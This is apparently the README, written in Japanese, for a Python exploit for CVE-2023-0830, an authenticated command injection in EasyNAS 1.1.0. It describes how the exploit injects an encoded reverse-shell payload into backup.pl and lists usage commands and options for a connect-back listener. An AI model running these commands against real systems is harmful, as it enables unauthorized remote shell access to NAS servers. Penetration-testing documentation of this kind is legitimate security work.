
EasyNAS バージョン 1.1.0 用のエクスプロイト。悪用される脆弱性はコマンドインジェクションの欠陥であり、認証が必要です。
このPythonスクリプトは、統合リスナーを含む拡張機能を備えたEasyNASバージョン1.1.0向けの強力なエクスプロイトです。悪用される脆弱性はコマンドインジェクションの欠陥であり、認証が必要です。
このスクリプトはターゲットサーバーとのセッションを確立し、ユーザーが指定した認証情報でログインリクエストを送信します。認証に成功すると、実行時にユーザー指定のIPアドレスとポートへのリバースシェル接続を開くペイロードを構築します。このペイロードはURLエンコードおよびBase64エンコードされ、細工されたGETリクエストを介してサーバー上のbackup.plファイルに注入されます。
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS IP address for the reverse shell listener (auto-detected by default)
--lport PORT Port for the reverse shell listener (default: 4444)
--protocol {http,https} Protocol to use (default: https)
--verbose Enable verbose output
--shell {bash,sh,python} Specify the shell type to use with integrated listener (default: bash)
このスクリプトは教育目的および許可を得たペネトレーションテスト専用です。ネットワークまたはシステムに対してペネトレーションテストを実行する前に、必ず明示的な許可を求めてください。
責任を持って使用してください。